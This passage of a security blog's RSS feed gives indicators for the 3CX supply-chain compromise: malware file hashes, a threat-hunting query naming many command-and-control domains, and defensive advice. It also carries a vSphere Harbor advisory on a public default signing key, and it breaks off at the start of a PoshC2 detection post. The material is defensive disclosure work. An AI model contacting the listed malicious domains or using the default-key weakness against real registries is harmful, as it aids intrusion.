data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">7c55c3dfa373b6b342390938029cb76ef31f609d9a07780772c6010a4297e321</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">e32cc0103827e8eef5881bd6fcae30ccc6bf6d68e8378c007a8fac2d8edbc071</span><span 
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><span data-contrast="auto">B5e318240401010e4453e146e3e67464dd625cfef9cd51c5015d68550ee8cc09</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-contrast="auto">Zip file</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><span data-contrast="auto">5c54932fdbb077d73c58ac41a1ad3f6ea5576b3e1f719c8b714b637c9ceb361b</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><span data-contrast="auto">b57d7e6c47516aeb1fd8384a9bc002f8c637b7d42b8f008a0c9e872914344dad</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-contrast="auto">ffmpeg.dll </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="4" 
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><span data-contrast="auto">7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><span data-contrast="auto">c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><span data-contrast="auto">253f3a53796f1b0fbe64f7b05ae1d66bc2b0773588d00c3d2bf08572a497fa59</span> <span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-contrast="auto">d3dcompiler_47.dll</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="11" data-aria-level="1"><span data-contrast="auto">11be1803e2e307b647a8a7e02d128335c448ff741bf06bf52b332e0bbf423b03</span><span 
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-contrast="auto">Secondary stage Payloads</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="12" data-aria-level="1"><span data-contrast="auto">851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7 </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><span data-contrast="auto">6a0f637546684c90809cf264c22a861c9a07b1ca3b2ef6a359a14d612e392c1a </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="14" data-aria-level="1"><span data-contrast="auto">aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" 
data-aria-posinset="15" data-aria-level="1"><span data-contrast="auto">F5fdefaa5321e2cea02ef8b479de8ec3c5505e956ea1484c84a7abb17231fe24</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="16" data-aria-level="1"><span data-contrast="auto">8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p aria-level="5"><b><span data-contrast="none">MacOS Samples</span></b><span data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":40,"335559739":0,"335559740":259}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="17" data-aria-level="1"><span data-contrast="none">5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="18" data-aria-level="1"><span data-contrast="none">fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" 
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="19" data-aria-level="1"><span data-contrast="none">e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="20" data-aria-level="1"><span data-contrast="none">a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="21" data-aria-level="1"><span data-contrast="none">b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="22" data-aria-level="1"><span data-contrast="none">fd15a9619987925827ede24efa8990c3680c9c0b4a76eb1c43031de39c1b7ae1</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" 
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><span data-contrast="none">9a47c9a3f7cf26ddc1fdb90dc48d30d69448e6d8ab64cc57dcb285c6b9d846c3</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="24" data-aria-level="1"><span data-contrast="none">92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="25" data-aria-level="1"><span data-contrast="none">c649e7c1897bfd30aad85c6b6736fcb2d002a7eaf64186eea00c1a44d6220803</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="26" data-aria-level="1"><span data-contrast="none">fdad2f34e466782e4b272d3f8505c49c3bb6269c8d5fd8846f0cc399f9744cba</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="4" 
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="27" data-aria-level="1"><span data-contrast="none">87c5d0c93b80acf61d24e7aaf0faae231ab507ca45483ad3d441b5d1acebc43c</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><b><span data-contrast="auto">How can you protect your organization? </span></b><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="none">3CX has </span><a href="https://www.3cx.com/blog/news/desktopapp-security-alert-updates/"><span data-contrast="none">provided mitigation guidance</span></a><span data-contrast="none">, which includes a recommendation to uninstall the 3CX desktop app. As of this writing, an updated desktop app was being prepared by 3CX. </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="none">One of the biggest challenges with supply chain attacks is that they are difficult to detect. Because the attack occurs through a third-party vendor, the business may not even be aware that an attack has taken place until it is too late. Organizations can minimize the overall risk of a supply chain attack by following security best practices. These include:</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <ul> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">Developing a robust security strategy that encompasses the entire supply chain. 
This means conducting thorough security checks on all vendors, ensuring that they have appropriate security measures in place, and regularly monitoring their systems for any potential threats.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">Implementing endpoint and network security solutions that can detect and respond to threats in real time, as well as advanced threat detection solutions that can identify anomalous threats as they occur.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li> <li data-leveltext="" data-font="Symbol" data-listid="2" data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span data-contrast="none">Ensuring a solid incident response plan is in place in case of a supply chain attack. 
This includes identifying the key stakeholders who need to be notified, as well as having a clear process in place for containing and mitigating the attack.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"><br /> </span></li> </ul> <p><span data-contrast="none">By taking these steps, businesses can reduce the risk of a supply chain attack and ensure the safety and security of their operations and customers.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><b><span data-contrast="auto">How can VMware security products help?</span></b><span data-contrast="auto"> </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <ul> <li data-leveltext="-" data-font="Calibri" data-listid="1" data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span data-contrast="auto">The hashes listed in this blog post have a known malware reputation and should be blocked automatically by </span><b><span data-contrast="auto">Carbon Black Cloud</span></b><span data-contrast="auto">.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li> <li data-leveltext="-" data-font="Calibri" data-listid="1" data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span data-contrast="auto">Carbon Black EDR</span></b><span data-contrast="auto"> customers can search for netconn traffic to the domains listed in this blog post.</span><span 
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li> <li data-leveltext="-" data-font="Calibri" data-listid="1" data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span data-contrast="auto">Carbon Black App Control</span></b><span data-contrast="auto"> customers can ban the hashes listed in this blog post.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li> <li data-leveltext="-" data-font="Calibri" data-listid="1" data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span data-contrast="auto">Carbon Black customers can also find additional product-related details and instructions by logging on to the user community and accessing this link: <a href="https://community.carbonblack.com/t5/Threat-Research-Docs/3CX-Compromise-a-k-a-Smooth-Operator/ta-p/117836" target="_blank" rel="noopener">HERE</a></span></li> <li data-leveltext="-" data-font="Calibri" data-listid="1" data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><span data-contrast="auto">For </span><b><span data-contrast="auto">NSX Advanced Threat Prevention</span></b><span data-contrast="auto"> (ATP), all published indicators are currently detected as malicious. 
Where guest virtual machines are protected by the Distributed Malware Prevention Service leveraging Guest Introspection, all malicious DLL files associated with this threat can be mitigated with a ‘detect and prevent’ malware prevention profile (</span><span data-contrast="auto">Figure 2</span><span data-contrast="auto"> shows how </span><b><span data-contrast="auto">NSX ATP </span></b><span data-contrast="auto">detects the malicious DLLs through Guest Introspection). </span><b><span data-contrast="auto">NSX ATP</span></b><span data-contrast="auto"> also has anomaly-based detectors specifically tailored to identify anomalous beaconing; the malicious domains associated with 3CXDesktopApp are now part of the network reputation feed provided by </span><b><span data-contrast="auto">NSX ATP</span></b><span data-contrast="auto">.</span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></li> </ul> <p><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM.png"><img decoding="async" loading="lazy" class="alignnone size-large wp-image-83436" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1024x467.png" alt="" width="1024" height="467" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1024x467.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-300x137.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-768x351.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1536x701.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-2048x935.png 2048w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-600x274.png 600w" sizes="(max-width: 1024px) 100vw, 1024px" 
/></a></span></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">2</span></i><i><span data-contrast="none">: User interface of NSX Guest Introspection Malware Prevention Service.</span></i><span data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <ul> <li data-leveltext="-" data-font="Calibri" data-listid="1" data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span data-contrast="auto">NSX ATP Standalone</span></b><span data-contrast="auto"> customers can also increase upload limits to support analyzing large files (up to 100MB on-premises; see the following article for instructions on how to change this: </span><a href="https://kb.vmware.com/s/article/900100?lang=en_US" target="_blank" rel="noopener">INSTRUCTIONS</a><span data-contrast="auto">), and threat hunt for the associated malicious network activity via the Network Explore console using the following search query: </span><i><span data-contrast="auto">“akamaicontainer.com OR akamaitechcloudservices.com OR azuredeploystore.com OR azureonlinecloud.com OR azureonlinestorage.com OR dunamistrd.com OR glcloudservice.com OR journalide.org OR msedgepackageinfo.com OR msstorageazure.com OR msstorageboxes.com OR officeaddons.com OR officestoragebox.com OR pbxcloudeservices.com OR pbxphonenetwork.com OR pbxsources.com OR sbmsa.wiki OR sourceslabs.com OR visualstudiofactory.com OR zacharryblogs.com OR </span></i><span data-contrast="none">qwepoi123098.com</span><i><span data-contrast="auto">”.</span></i><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li> </ul> <p><span data-ccp-props="{"201341983":0,"335559685":720,"335559739":160,"335559740":259}"> </span></p><p>The post <a 
rel="nofollow" href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Investigating 3CX Desktop Application Attacks: What You Need to Know</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... </item> <item> <title>Embedded vSphere Harbor default enablement results in an insecure configuration</title> <link>https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html?utm_source=rss&utm_medium=rss&utm_campaign=embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration</link> <dc:creator> <![CDATA[ Monty Ijzerman ]]> ... </dc:creator> <pubDate>Fri, 31 Mar 2023 05:23:42 +0000</pubDate> <category> <![CDATA[ VMware Security Response Center ]]> ... </category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83429</guid> <description> <![CDATA[ <div><img width="300" height="158" src="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg" class="attachment-medium size-medium wp-post-image" alt="Server Advanced Workload Protection" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg 300w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1024x540.jpg 1024w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-768x405.jpg 768w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1536x810.jpg 1536w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-600x317.jpg 600w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311.jpg 1600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>This post is relevant to administrators that have enabled the embedded Harbor 
version in vSphere 7.0 or 8.0 as explained in Enable the Embedded Harbor Registry on the Supervisor Cluster. Harbor-helm issue Harbor when installed with harbor-helm will use a default key pair if no key pair is specified in core.secretName in values.yaml. This default … <a href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Embedded vSphere Harbor default enablement results in an insecure configuration</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </description> <content:encoded> <![CDATA[ <div><img width="300" height="158" src="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg" class="attachment-medium size-medium wp-post-image" alt="Server Advanced Workload Protection" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg 300w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1024x540.jpg 1024w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-768x405.jpg 768w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1536x810.jpg 1536w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-600x317.jpg 600w, https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311.jpg 1600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>This post is relevant to administrators that have enabled the embedded Harbor version in vSphere 7.0 or 8.0 as explained in <a 
href="https://docs.vmware.com/en/VMware-vSphere/7.0/vmware-vsphere-with-tanzu/GUID-AE24CF79-3C74-4CCD-B7C7-757AD082D86A.html#GUID-AE24CF79-3C74-4CCD-B7C7-757AD082D86A">Enable the Embedded Harbor Registry on the Supervisor Cluster</a>.</p> <p><strong>Harbor-helm issue</strong><br /> Harbor when installed with harbor-helm will use a default key pair if no key pair is specified in core.secretName in values.yaml. This default key pair is public and can be used to sign the JWT token. This token allows for pulling and pushing images in Harbor. See here for the <a href="https://github.com/goharbor/harbor/security/advisories/GHSA-j7jh-fmcm-xxwv">Harbor-helm advisory</a> which documents the issue.</p> <p><strong>vSphere</strong><br /> The embedded Harbor registry on a vSphere Supervisor has an insecure configuration due to the Harbor-helm issue. Normally, projects on an embedded Harbor registry are private and 1:1 mapped to Supervisor namespaces, and only users with proper permissions to Supervisor namespaces can pull / push images to the corresponding Harbor projects. 
However, this issue can break the isolation and access protection of the container images in those projects.<br /> The issue is present in all current versions of vSphere prior to vCenter Server 7.0 U3l and vCenter Server 8.0c that have the embedded Harbor enabled and that have not changed the default configuration.</p> <p><strong>Existing enabled embedded Harbor registry in vSphere</strong><br /> VMware advises customers that have enabled the embedded Harbor version in vSphere and that have not changed the default configuration to:<br /> – Deploy vCenter Server 7.0 U3l or vCenter Server 8.0c, which address the issue for already enabled embedded Harbor registries by removing the default key pair, or<br /> – Change the default configuration by following the temporary workaround steps listed in <a href="http://kb.vmware.com/kb/91452">VMware Knowledge Base article 91452</a>.</p> <p><strong>Newly enabled embedded Harbor in vSphere</strong><br /> If the embedded Harbor registry is enabled on vCenter Server 7.0 U3l or vCenter Server 8.0c, the issue is not present.</p> <p><strong>Note</strong><br /> The VMware Harbor Container Registry for Tanzu Kubernetes Grid Integrated Edition is not installed through Harbor-helm and therefore does not have the insecure Harbor default installation.</p> <p><strong>Acknowledgement</strong><br /> VMware would like to thank Sam Erb from Google for reporting this issue to us.</p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Embedded vSphere Harbor default enablement results in an insecure configuration</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... 
</item> <item> <title>How to Detect PoshC2 PowerShell Implants</title> <link>https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html?utm_source=rss&utm_medium=rss&utm_campaign=how-to-detect-poshc2-powershell-implants</link> <dc:creator> <![CDATA[ Oleg Boyarchuk ]]> ... </dc:creator> <pubDate>Fri, 24 Mar 2023 21:03:01 +0000</pubDate> <category> <![CDATA[ Threat Analysis Unit ]]> ... </category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83405</guid> <description> <![CDATA[ <div><img width="300" height="157" src="https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/ ]]> <![CDATA[ files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png 300w, https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-1024x535.png 1024w, https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-768x402.png 768w, https://blogs.vmware.co ]]> <![CDATA[ m/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-600x314.png 600w, https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4.png 1201w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>PoshC2 is a proxy-aware cross-platform C2 framework that natively supports 